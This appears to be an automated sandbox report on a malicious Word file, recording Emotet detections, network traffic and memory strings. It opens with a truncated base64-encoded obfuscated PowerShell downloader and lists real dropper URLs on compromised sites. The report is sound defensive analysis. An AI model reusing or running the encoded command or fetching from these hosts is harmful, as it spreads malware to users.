IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnACkAKwAnACAAcwAnACsAKAAnAGgAJwArACcAIABiADoAJwArACcAL

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://fifacoinsbox.com/wp-content/7gYt/Avira URL Cloud: Label: malware
                      Source: http://yourcleanersurfaces.com/four-monks-acasz/O2my/Avira URL Cloud: Label: malware
                      Source: http://www.91yudao.com/wp-admin/KKHt1/Avira URL Cloud: Label: malware
                      Source: http://seamart.info/alfacgiapi/q92A/Avira URL Cloud: Label: malware
                      Source: https://rbdck.com/wp-content/uploads/sucuri/lewfK/Avira URL Cloud: Label: malware
                      Source: http://uagritech.com/cgi-bin/a5G/Avira URL Cloud: Label: malware
                      Source: http://laymancoder.com/rustic-decor-1gbad/Us/Avira URL Cloud: Label: malware
                      Source: http://seamart.info/alfacgiapi/q92A/PAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: www.91yudao.comVirustotal: Detection: 7%Perma Link
                      Source: yourcleanersurfaces.comVirustotal: Detection: 9%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Mensaje-22-012021.docVirustotal: Detection: 61%Perma Link
                      Source: Mensaje-22-012021.docMetadefender: Detection: 32%Perma Link
                      Source: Mensaje-22-012021.docReversingLabs: Detection: 62%
                      Source: 24.2.rundll32.exe.10000000.0.unpackAvira: Label: TR/Spy.Gen

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\d source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdbge source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: uagritech.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in memory: http://uagritech.com/cgi-bin/a5G/!http://www.91yudao.com/wp-admin/KKHt1/!http://yourcleanersurfaces.com/four-monks-acasz/O2my/!http://laymancoder.com/rustic-decor-1gbad/Us/!https://rbdck.com/wp-content/uploads/sucuri/lewfK/!https://fifacoinsbox.com/wp-content/7gYt/!http://seamart.info/alfacgiapi/q92A/
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1Host: uagritech.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: uagritech.com
                      Source: global trafficHTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1Host: yourcleanersurfaces.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1Host: uagritech.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: uagritech.com
                      Source: global trafficHTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1Host: yourcleanersurfaces.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: uagritech.com
                      Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://laymancoder.com/rustic-decor-1gbad/Us/
                      Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://seamart.info/alfacgiapi/q92A/
                      Source: powershell.exe, 00000005.00000002.2167131717.0000000002D44000.00000004.00000001.sdmpString found in binary or memory: http://seamart.info/alfacgiapi/q92A/P
                      Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmpString found in binary or memory: http://uagritech.com
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2170760587.000000001B54A000.00000004.00000001.sdmpString found in binary or memory: http://uagritech.com/cgi-bin/a5G/
                      Source: powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmpString found in binary or memory: http://uagritech.com/cgi-sys/suspendedpage.cgi
                      Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2184265558.00000000027D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpString found in binary or memory: http://www.91yudao.com
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://www.91yudao.com/wp-admin/KKHt1/
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpString found in binary or memory: http://yourcleanersurfaces.com
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://yourcleanersurfaces.com/four-monks-acasz/O2my/
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: https://fifacoinsbox.com/wp-content/7gYt/
                      Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: https://rbdck.com/wp-content/uploads/sucuri/lewfK/
                      Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.300000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
